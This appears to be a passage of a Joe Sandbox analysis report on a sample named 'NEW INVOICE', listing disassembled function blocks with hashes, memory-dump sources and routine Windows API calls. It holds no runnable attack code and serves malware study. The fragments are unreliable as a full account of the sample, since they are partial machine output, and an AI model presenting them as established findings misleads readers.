                                                                                    • Opcode ID: 1dcf289f501924a5df592eae16a0ec0030d5246948486ec38c60cdc62178aa5b
                                                                                    • Instruction ID: 8efa427203ffd7a45d167e3a64f6abf3f3640219bb0751621114887cb14f0fc1
                                                                                    • Opcode Fuzzy Hash: 1dcf289f501924a5df592eae16a0ec0030d5246948486ec38c60cdc62178aa5b
                                                                                    • Instruction Fuzzy Hash: 4751BB71544304A7D720EF61CC86FDBB3E8AF84748F00492EF58957182E775E645C7AA
                                                                                    APIs
                                                                                    • SendMessageW.USER32(?,00001308,?,00000000), ref: 004552B7
                                                                                    • ImageList_Remove.COMCTL32(?,?,?,?), ref: 004552EB
                                                                                    • SendMessageW.USER32(?,0000133D,?,00000002), ref: 004553D3
                                                                                    • DeleteObject.GDI32(?), ref: 0045564E
                                                                                    • DeleteObject.GDI32(?), ref: 0045565C
                                                                                    • DestroyIcon.USER32(?,?,?,?,?), ref: 0045566A
                                                                                    • DestroyWindow.USER32(?,?,?,?,?), ref: 00455678
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2062085861.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2062040891.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062161121.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062222794.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_NEW INVOICE.jbxd
                                                                                    Similarity
                                                                                    • API ID: DeleteDestroyMessageObjectSend$IconImageList_RemoveWindow
                                                                                    • String ID:
                                                                                    • API String ID: 2354583917-0
                                                                                    • Opcode ID: b44580b005306b3b7f9b1dbab51831616e075f248f5ed84087b7c105bb41b1f9
                                                                                    • Instruction ID: 19c5dc8500d05a42ca126c51664c70dafe1d1a8ca3b523478e8997b137d6e309
                                                                                    • Opcode Fuzzy Hash: b44580b005306b3b7f9b1dbab51831616e075f248f5ed84087b7c105bb41b1f9
                                                                                    • Instruction Fuzzy Hash: 77519D30204A419FC714DF24C4A4B7A77E5FB49301F4486AEFD9ACB392DB78A849CB54
                                                                                    APIs
                                                                                      • Part of subcall function 0046DD22: IsWindow.USER32(00000000), ref: 0046DD51
                                                                                    • GetMenu.USER32 ref: 004776AA
                                                                                    • GetMenuItemCount.USER32(00000000), ref: 004776CC
                                                                                    • GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 004776FB
                                                                                    • _wcslen.LIBCMT ref: 0047771A
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2062085861.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2062040891.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062161121.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062222794.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_NEW INVOICE.jbxd
                                                                                    Similarity
                                                                                    • API ID: Menu$CountItemStringWindow_wcslen
                                                                                    • String ID:
                                                                                    • API String ID: 1823500076-0
                                                                                    • Opcode ID: 3c1e0179b5075f45df12b398ec391808b8d2f1e7a16a5d1bec5683dd9427006f
                                                                                    • Instruction ID: 4b9e656becebfc5f52f27a1d7ad2c07a58398098864d75d3a5ce1c02cc274359
                                                                                    • Opcode Fuzzy Hash: 3c1e0179b5075f45df12b398ec391808b8d2f1e7a16a5d1bec5683dd9427006f
                                                                                    • Instruction Fuzzy Hash: 174117715083019FD320EF25CC45BABB3E8BF88314F10492EF55997252D7B8E9458BA9
                                                                                    APIs
                                                                                    • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 0044890A
                                                                                    • SendMessageW.USER32(?,00000469,?,00000000), ref: 00448920
                                                                                    • EnableWindow.USER32(004A83D8,00000000), ref: 00448BAB
                                                                                    • EnableWindow.USER32(004A83D8,00000001), ref: 00448BC1
                                                                                    • ShowWindow.USER32(004A83D8,00000000,004A83D8,?,?), ref: 00448C37
                                                                                    • ShowWindow.USER32(004A83D8,00000004,004A83D8), ref: 00448C43
                                                                                    • EnableWindow.USER32(004A83D8,00000001), ref: 00448C58
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2062085861.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2062040891.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062161121.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062222794.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_NEW INVOICE.jbxd
                                                                                    Similarity
                                                                                    • API ID: Window$Enable$Show$MessageMoveSend
                                                                                    • String ID:
                                                                                    • API String ID: 896007046-0
                                                                                    • Opcode ID: 440e8810410bf42a4c8e03fd117b8fd843bde7e89b0e2674ab81ad81c9f8ea0f
                                                                                    • Instruction ID: 0809a8548e22334437b8974569d6adfa08582830463fbdb99c3481629354d751
                                                                                    • Opcode Fuzzy Hash: 440e8810410bf42a4c8e03fd117b8fd843bde7e89b0e2674ab81ad81c9f8ea0f
                                                                                    • Instruction Fuzzy Hash: 63419E746043419FF7248B24C884B6FB7A1FB99305F18886EF98197391DA78A845CB59
                                                                                    APIs
                                                                                    • SendMessageW.USER32(?,000000F0,00000000,00000000), ref: 0044140E
                                                                                    • GetWindowLongW.USER32(?,000000F0), ref: 00441452
                                                                                    • GetWindowLongW.USER32(?,000000F0), ref: 00441493
                                                                                    • SendMessageW.USER32(00A71BE8,000000F1,00000000,00000000), ref: 004414C6
                                                                                    • SendMessageW.USER32(00A71BE8,000000F1,00000001,00000000), ref: 004414F1
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2062085861.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2062040891.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062161121.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062222794.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_NEW INVOICE.jbxd
                                                                                    Similarity
                                                                                    • API ID: MessageSend$LongWindow
                                                                                    • String ID:
                                                                                    • API String ID: 312131281-0
                                                                                    • Opcode ID: ed470013e842d905752aa6f8daaa5f1d8e955df317e7b96a507e5c494099af20
                                                                                    • Instruction ID: f6a862a32ccfd92e4f153a1965fa7dc80102ffdb8abe4b8a046001f82176c48d
                                                                                    • Opcode Fuzzy Hash: ed470013e842d905752aa6f8daaa5f1d8e955df317e7b96a507e5c494099af20
                                                                                    • Instruction Fuzzy Hash: 2F416A347442019FE720CF58DCC4F6A77A5FB8A754F24416AE5519B3B1CB75AC82CB48
                                                                                    APIs
                                                                                    • _memset.LIBCMT ref: 004484C4
                                                                                    • GetMenuItemInfoW.USER32(?,?,00000000,004A83D8), ref: 00448562
                                                                                    • IsMenu.USER32(?), ref: 0044857B
                                                                                    • InsertMenuItemW.USER32(?,?,00000001,004A83D8), ref: 004485D0
                                                                                    • DrawMenuBar.USER32 ref: 004485E4
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2062085861.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2062040891.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062161121.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062222794.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_NEW INVOICE.jbxd
                                                                                    Similarity
                                                                                    • API ID: Menu$Item$DrawInfoInsert_memset
                                                                                    • String ID: 0
                                                                                    • API String ID: 3866635326-4108050209
                                                                                    • Opcode ID: 42a201a1e731261e29c9ff9b40de176b55a78da0b06957c9f64dc5096dc7767a
                                                                                    • Instruction ID: c1b4c65bd9dbf201e14e83578cc8030a3c247867dd5f1e451e409e2153a24926
                                                                                    • Opcode Fuzzy Hash: 42a201a1e731261e29c9ff9b40de176b55a78da0b06957c9f64dc5096dc7767a
                                                                                    • Instruction Fuzzy Hash: 9F417F75604341AFE710CF45C984B6BB7E4FB89304F14881EFA554B391DBB4E849CB5A
                                                                                    APIs
                                                                                    • InterlockedIncrement.KERNEL32 ref: 0047247C
                                                                                    • InterlockedDecrement.KERNEL32(004A7CAC), ref: 00472491
                                                                                    • Sleep.KERNEL32(0000000A), ref: 00472499
                                                                                    • InterlockedIncrement.KERNEL32(004A7CAC), ref: 004724A4
                                                                                    • InterlockedDecrement.KERNEL32(004A7CAC), ref: 00472599
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2062085861.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2062040891.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062161121.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062222794.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_NEW INVOICE.jbxd
                                                                                    Similarity
                                                                                    • API ID: Interlocked$DecrementIncrement$Sleep
                                                                                    • String ID: 0vH
                                                                                    • API String ID: 327565842-3662162768
                                                                                    • Opcode ID: bfb173672284e31ba0a3017bb0c7d670cf276827bd066f711b3c3b49063f60eb
                                                                                    • Instruction ID: 7246262c18bb701d5349304b0e2d21290bf7c9637501dd5a114e6955e8e78370
                                                                                    • Opcode Fuzzy Hash: bfb173672284e31ba0a3017bb0c7d670cf276827bd066f711b3c3b49063f60eb
                                                                                    • Instruction Fuzzy Hash: 9631D2329082259BD710DF28DD41A8A77A5EB95324F05483EFD08FB251DB78EC498BED
                                                                                    APIs
                                                                                    • SendMessageW.USER32(?,00000401,?,00000000), ref: 00448B16
                                                                                    • GetFocus.USER32 ref: 00448B1C
                                                                                    • EnableWindow.USER32(004A83D8,00000000), ref: 00448BAB
                                                                                    • EnableWindow.USER32(004A83D8,00000001), ref: 00448BC1
                                                                                    • ShowWindow.USER32(004A83D8,00000000,004A83D8,?,?), ref: 00448C37
                                                                                    • ShowWindow.USER32(004A83D8,00000004,004A83D8), ref: 00448C43
                                                                                    • EnableWindow.USER32(004A83D8,00000001), ref: 00448C58
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2062085861.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2062040891.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062161121.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062222794.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_NEW INVOICE.jbxd
                                                                                    Similarity
                                                                                    • API ID: Window$Enable$Show$FocusMessageSend
                                                                                    • String ID:
                                                                                    • API String ID: 3429747543-0
                                                                                    • Opcode ID: f5aca3f6d68f8169105ace43209457086b036621b25274999c7621d4cb9b91fc
                                                                                    • Instruction ID: 96ed947056310062a3fa6d2350adc65d304252fdbf70c479ab88671ed4e09c2c
                                                                                    • Opcode Fuzzy Hash: f5aca3f6d68f8169105ace43209457086b036621b25274999c7621d4cb9b91fc
                                                                                    • Instruction Fuzzy Hash: FC31B4706443819BF7248E14C8C4BAFB7D0EB95745F04492EF981A6291DBA89845C719
                                                                                    APIs
                                                                                    • LoadStringW.USER32(?,00000065,?,0000007F), ref: 0042A9B0
                                                                                      • Part of subcall function 004021E0: _wcslen.LIBCMT ref: 004021F2
                                                                                    • _memset.LIBCMT ref: 00401C62
                                                                                    • _wcsncpy.LIBCMT ref: 00401CA1
                                                                                    • _wcscpy.LIBCMT ref: 00401CBD
                                                                                    • Shell_NotifyIconW.SHELL32(00000001,?), ref: 00401CCF
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2062085861.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2062040891.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062161121.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062222794.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_NEW INVOICE.jbxd
                                                                                    Similarity
                                                                                    • API ID: IconLoadNotifyShell_String_memset_wcscpy_wcslen_wcsncpy
                                                                                    • String ID: Line:
                                                                                    • API String ID: 1620655955-1585850449
                                                                                    • Opcode ID: b1e388f5f21e32c190c1b7412400e6ffb6374e41c1d48bdcdb7aece10813d053
                                                                                    • Instruction ID: a4e7cf3abc31881c2b93aaae0beefbbd48c64772eea77d32b53e92a0700a02c6
                                                                                    • Opcode Fuzzy Hash: b1e388f5f21e32c190c1b7412400e6ffb6374e41c1d48bdcdb7aece10813d053
                                                                                    • Instruction Fuzzy Hash: 7431D47151C301ABD324EB11DC41BDB77E8AF94314F04493FF989521A1DB78AA49C79B
                                                                                    APIs
                                                                                    • SetErrorMode.KERNEL32(00000001), ref: 0045D32F
                                                                                    • GetVolumeInformationW.KERNEL32(?,?,000000FF,?,?,?,?,000000FF,?), ref: 0045D3B3
                                                                                    • __swprintf.LIBCMT ref: 0045D3CC
                                                                                    • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D416
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2062085861.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2062040891.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062161121.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062222794.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_NEW INVOICE.jbxd
                                                                                    Similarity
                                                                                    • API ID: ErrorMode$InformationVolume__swprintf
                                                                                    • String ID: %lu$HH
                                                                                    • API String ID: 3164766367-3924996404
                                                                                    • Opcode ID: bd20e614eacc1ec6e7ce8a240dc663141bf9142d6fc10aee8c7bf862d4d2af0b
                                                                                    • Instruction ID: e4de0c6df68350460ad5232616e5185c9d799459bd1b640414cfcbd8d86849a8
                                                                                    • Opcode Fuzzy Hash: bd20e614eacc1ec6e7ce8a240dc663141bf9142d6fc10aee8c7bf862d4d2af0b
                                                                                    • Instruction Fuzzy Hash: 85314A716083019BC310EF55D941A5BB7E4FF88704F40892EFA4597292D774EA09CB9A
                                                                                    APIs
                                                                                    • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00450E24
                                                                                    • SendMessageW.USER32(00000000,00000409,00000000,FF000000), ref: 00450E35
                                                                                    • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 00450E43
                                                                                    • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00450E54
                                                                                    • SendMessageW.USER32(00000000,00000404,00000001,00000000), ref: 00450E62
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2062085861.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2062040891.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062161121.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062222794.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_NEW INVOICE.jbxd
                                                                                    Similarity
                                                                                    • API ID: MessageSend
                                                                                    • String ID: Msctls_Progress32
                                                                                    • API String ID: 3850602802-3636473452
                                                                                    • Opcode ID: 42656bfbb5a190feb894f1e63281698c22ff60bbec02a0e57f9bf8616b6fd2a5
                                                                                    • Instruction ID: b51c377fab27852337593a8f268aff884918310fa347e0537580fa9f3b853d23
                                                                                    • Opcode Fuzzy Hash: 42656bfbb5a190feb894f1e63281698c22ff60bbec02a0e57f9bf8616b6fd2a5
                                                                                    • Instruction Fuzzy Hash: 2C2121712543007AE7209A65DC42F5BB3E9AFD8B24F214A0EF754B72D1C6B4F8418B58
                                                                                    APIs
                                                                                    • ___set_flsgetvalue.LIBCMT ref: 00415737
                                                                                    • __calloc_crt.LIBCMT ref: 00415743
                                                                                    • __getptd.LIBCMT ref: 00415750
                                                                                    • CreateThread.KERNEL32(00000000,?,0041568B,00000000,00000004,00000000), ref: 00415776
                                                                                    • ResumeThread.KERNEL32(00000000,?,?,?,?,?,?,00000000), ref: 00415786
                                                                                    • GetLastError.KERNEL32(?,?,?,?,?,?,00000000), ref: 00415791
                                                                                    • __dosmaperr.LIBCMT ref: 004157A9
                                                                                      • Part of subcall function 00417F23: __getptd_noexit.LIBCMT ref: 00417F23
                                                                                      • Part of subcall function 00417EBB: __decode_pointer.LIBCMT ref: 00417EC6
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2062085861.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2062040891.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062161121.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062222794.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_NEW INVOICE.jbxd
                                                                                    Similarity
                                                                                    • API ID: Thread$CreateErrorLastResume___set_flsgetvalue__calloc_crt__decode_pointer__dosmaperr__getptd__getptd_noexit
                                                                                    • String ID:
                                                                                    • API String ID: 1269668773-0
                                                                                    • Opcode ID: bb8068f02d799d687f86b9c43e1e9df3108372b57b840b2ce394e22bf251b6d0
                                                                                    • Instruction ID: 083f1b3d72dc2b4e3073d7627409da2efaae6cca9fbdfa2eb2c15b7cb2a145f7
                                                                                    • Opcode Fuzzy Hash: bb8068f02d799d687f86b9c43e1e9df3108372b57b840b2ce394e22bf251b6d0
                                                                                    • Instruction Fuzzy Hash: 4511E672501604EFC720AF76DC868DF7BA4EF80334F21412FF525922D1DB788981966D
                                                                                    APIs
                                                                                      • Part of subcall function 00438FE4: GetProcessHeap.KERNEL32(00000008,0000000C,0043910A,00000000,00000000,00000000,0044646E,?,?,?), ref: 00438FE8
                                                                                      • Part of subcall function 00438FE4: HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00438FEF
                                                                                    • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,00000000,00000000,00000000,0044646E,?,?,?), ref: 00439119
                                                                                    • GetCurrentProcess.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00439123
                                                                                    • DuplicateHandle.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0043912C
                                                                                    • GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002,?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00439138
                                                                                    • GetCurrentProcess.KERNEL32(?,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00439142
                                                                                    • DuplicateHandle.KERNEL32(00000000,?,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,?), ref: 00439145
                                                                                    • CreateThread.KERNEL32(00000000,00000000,004390C2,00000000,00000000,00000000), ref: 0043915E
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2062085861.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2062040891.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062161121.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062222794.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_NEW INVOICE.jbxd
                                                                                    Similarity
                                                                                    • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                                                                                    • String ID:
                                                                                    • API String ID: 1957940570-0
                                                                                    • Opcode ID: ae016cd78919e3da0d3d218cc031d8d4f693afb8d34ff927aa47fd3b6f506194
                                                                                    • Instruction ID: b388a4287fabc35bf2088fa38ebc9459a42e34e8a642192e1b63b89709cb9be3
                                                                                    • Opcode Fuzzy Hash: ae016cd78919e3da0d3d218cc031d8d4f693afb8d34ff927aa47fd3b6f506194
                                                                                    • Instruction Fuzzy Hash: 3BF0CD753413007BD220EB65DC86F5BB7A8EBC9B10F118919F6049B1D1C6B4A800CB65
                                                                                    APIs
                                                                                    • ___set_flsgetvalue.LIBCMT ref: 00415690
                                                                                      • Part of subcall function 00416A84: TlsGetValue.KERNEL32(00411739,00416C10,?,00411739,00417F28,00413979,?,?,00411739,?,00401C0B), ref: 00416A8D
                                                                                      • Part of subcall function 00416A84: __decode_pointer.LIBCMT ref: 00416A9F
                                                                                      • Part of subcall function 00416A84: TlsSetValue.KERNEL32(00000000,00411739,00417F28,00413979,?,?,00411739,?,00401C0B), ref: 00416AAE
                                                                                    • ___fls_getvalue@4.LIBCMT ref: 0041569B
                                                                                      • Part of subcall function 00416A64: TlsGetValue.KERNEL32(?,?,004140F1,00000000), ref: 00416A72
                                                                                    • ___fls_setvalue@8.LIBCMT ref: 004156AD
                                                                                      • Part of subcall function 00416AB8: __decode_pointer.LIBCMT ref: 00416AC9
                                                                                    • GetLastError.KERNEL32(00000000,?,00000000), ref: 004156B6
                                                                                    • ExitThread.KERNEL32 ref: 004156BD
                                                                                    • __freefls@4.LIBCMT ref: 004156D9
                                                                                    • __IsNonwritableInCurrentImage.LIBCMT ref: 004156EC
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2062085861.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2062040891.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062161121.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062222794.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_NEW INVOICE.jbxd
                                                                                    Similarity
                                                                                    • API ID: Value$__decode_pointer$CurrentErrorExitImageLastNonwritableThread___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4
                                                                                    • String ID:
                                                                                    • API String ID: 4166825349-0
                                                                                    • Opcode ID: 185d0aae8fe32bab84a079219336c355dd614541d1aff55515eff8c05f91681e
                                                                                    • Instruction ID: 1015f584654e325efa3cacb901eba7c9ae2b5aefa54885f90b4e6d99173acdac
                                                                                    • Opcode Fuzzy Hash: 185d0aae8fe32bab84a079219336c355dd614541d1aff55515eff8c05f91681e
                                                                                    • Instruction Fuzzy Hash: 14F049745007009BD704BF72DD159DE7B69AF85345761C85FB80897222DA3DC9C1CB9C
                                                                                    APIs
                                                                                    • LoadLibraryA.KERNEL32(advapi32.dll,p#D,0043415E,p#D,?,00442370,?), ref: 00434134
                                                                                    • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00434146
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2062085861.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2062040891.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062161121.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062189780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2062222794.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_NEW INVOICE.jbxd
                                                                                    Similarity
                                                                                    • API ID: AddressLibraryLoadProc
                                                                                    • String ID: RegDeleteKeyExW$advapi32.dll$p#D$p#D
                                                                                    • API String ID: 2574300362-3261711971
                                                                                    • Opcode ID: 3da92f374f37a9fa7395fa6ef73d3af1d379715eec5b41da1672ebd70bf57acc
                                                                                    • Instruction ID: cb82693085896f9455b4638215a98dd7e3cb824177552166877179ce6000b7c2
                                                                                    • Opcode Fuzzy Hash: 3da92f374f37a9fa7395fa6ef73d3af1d379715eec5b41da1672ebd70bf57acc
                                                                                    • Instruction Fuzzy Hash: D8D05EB0400B039FCB105F24D8086AB76F4EB68700F208C2EF989A3750C7B8E8C0CB68
                                                                                    Memory Dump Source
